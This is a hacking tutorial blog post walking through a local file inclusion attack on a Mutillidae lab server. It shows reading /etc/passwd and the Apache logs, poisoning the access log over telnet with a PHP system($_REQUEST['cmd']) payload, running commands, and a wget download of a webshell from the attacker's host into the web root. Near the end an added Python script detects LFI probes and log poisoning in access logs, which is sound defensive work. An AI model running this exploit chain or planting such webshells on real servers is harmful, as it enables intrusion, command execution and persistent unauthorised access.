Today I will share how to upload a shell to a web server using local file inclusion (LFI).
First I tried a web application that is vulnerable to LFI, and injected the page variable like this:
http://192.168.56.101/mutillidae/index.php?page=.../ and it returned an error like the one below:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /opt/lampp/htdocs/mutillidae/index.php on line 352
Warning: include() [function.include]: Failed opening '../' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/mutillidae/index.php on line 352
This means the site can be exploited. The next job was to reach /etc/passwd through the inclusion, which returned:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
avahi:x:104:108:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:105:109::/home/cupsys:/bin/false
haldaemon:x:106:110:Hardware abstraction layer,,,:/var/run/hal:/bin/false
hplip:x:107:7:HPLIP system user,,,:/var/run/hplip:/bin/false
soikrucil:x:1000:1000:SOy,,,:/home/soikrucil:/bin/bash
Next I had to find the location of the error_log and access_log files, so I tried a request like this:
and the result was:
192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/jquery.min.js HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu-v.css HTTP/1.1" 304 -
192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/ddsmoothmenu.js
Then I tested the error_log the same way:
and the result was:
[Tue Aug 09 21:39:25 2011] [error] [client 192.168.56.1] Invalid method in request \xff\xf4\xff\xfd\x06
That is all the content of the error_log and access_log files.
Now I try to poison the log with a bad request that contains a simple script.
I opened a console and connected to the target on port 80 with telnet; the session looked like this:
root@bt:~# telnet 192.168.56.101 80
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
GET /<? system ($_REQUEST['cmd']); ?> HTTP/0.1
HTTP/1.1 400 Bad Request
Date: Tue, 09 Aug 2011 13:45:19 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 399
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80</address>
</body></html>
Connection closed by foreign host.
This request is written to the error_log and access_log files, which means I can reach my script through the local file inclusion from before.
Once the log had been written, I requested the access_log path through the inclusion again
and got an error like this:
Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/logs/access_log on line 32
HTTP/0.1 " 400 399
This means the script was written to the log successfully. Now I try to execute a command such as id,
like this:
and the result of the command:
09/Aug/2011:21:46:20 +0700] "GET /uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) HTTP/0.1 " 400 399 192.168.56.1 - -
Now it is time to upload my webshell, wahahaha.
I did not quite believe the webshell had been uploaded, so I checked the error_log, and it said the file was saved successfully. The result looked like this:
92.168.56.1] request failed: error reading the headers
wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget)
wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget)
--21:58:12-- http://192.168.56.1/shEll.txt
=> `/opt/lampp/htdocs/soi.php'
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2.800 (2.7K) [text/plain]
0K .. 100% 148.35 MB/s
21:58:12 (148.35 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]
wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget)
wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget)
--21:58:17-- http://192.168.56.1/shEll.txt
=> `/opt/lampp/htdocs/soi.php'
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2.800 (2.7K) [text/plain]
0K .. 100% 140.54 MB/s
21:58:17 (140.54 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]
and I can access my webshell at the URL:
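Seen from the defending side, every step of the chain above (traversal in the page parameter, reads of /etc/passwd and the Apache logs, a hand-crafted request carrying a PHP tag) leaves a distinctive entry in access_log. The detector below is an added example, not code from the original post; its sample entries are constructed to mirror the post's log format, and the flagged payload is the one the post itself shows.

```python
import re
from urllib.parse import unquote

# Apache access_log entry (common log format): IP ident user [time] "request" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')
# Request line; the path is matched lazily so a payload containing spaces still parses
REQ_RE = re.compile(r'^(?P<method>\S+)\s+(?P<path>.*?)(?:\s+(?P<version>HTTP/\S+))?$')
PHP_TAG_RE = re.compile(r'<\?(?:php|=)?', re.IGNORECASE)
# Files an LFI probe typically asks for: account files, the web server's own logs, /proc
SENSITIVE_RE = re.compile(r'/etc/(?:passwd|shadow)|(?:access|error)[._-]?log|/proc/self/',
                          re.IGNORECASE)

def analyse_access_line(line):
    """Return the reasons one access_log entry looks like LFI probing or log poisoning."""
    m = ACCESS_RE.match(line)
    if not m:
        return ['unparseable access_log entry']
    # Decode percent-encoding so %3C%3F (an encoded "<?") is caught as well
    r = REQ_RE.match(unquote(m.group('req')))
    if not r:
        return ['empty request line']
    path, version = r.group('path'), r.group('version') or ''
    reasons = []
    if PHP_TAG_RE.search(path):
        reasons.append('PHP open tag in request line (log poisoning payload)')
    if '../' in path or '..\\' in path:
        reasons.append('directory traversal in path or query (LFI probe)')
    if SENSITIVE_RE.search(path):
        reasons.append('request names a sensitive file or a server log (LFI target)')
    if version and version not in ('HTTP/1.0', 'HTTP/1.1', 'HTTP/2.0'):
        reasons.append('non-standard HTTP version %s (hand-crafted request)' % version)
    if m.group('status') == '400' and reasons:
        reasons.append('400 Bad Request: the malformed request was still logged')
    return reasons

def scan_access_log(lines):
    """Map each suspicious line number (1-based) to its list of reasons."""
    findings = {}
    for n, line in enumerate(lines, 1):
        reasons = analyse_access_line(line)
        if reasons:
            findings[n] = reasons
    return findings

# Constructed sample entries modelled on the post's log format (not real traffic)
SAMPLE_LOG = [
    '192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 -',
    '192.168.56.1 - - [09/Aug/2011:21:40:02 +0700] "GET /mutillidae/index.php?page=../../../../etc/passwd HTTP/1.1" 200 1714',
    '192.168.56.1 - - [09/Aug/2011:21:45:19 +0700] "GET /<? system ($_REQUEST[\'cmd\']); ?> HTTP/0.1" 400 399',
    '192.168.56.1 - - [09/Aug/2011:21:46:20 +0700] "GET /mutillidae/index.php?page=../../../../opt/lampp/logs/access_log&cmd=id HTTP/1.1" 200 5120',
    '192.168.56.1 - - [09/Aug/2011:21:50:00 +0700] "GET /%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1" 404 -',
]

if __name__ == '__main__':
    for n, reasons in scan_access_log(SAMPLE_LOG).items():
        print('line %d: %s' % (n, '; '.join(reasons)))
```

Feeding a real access_log through scan_access_log shows the poisoning request and the later inclusion of the log file as separate hits, so the two halves of the attack can be correlated by client address and time.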
thanks ....by 5oy..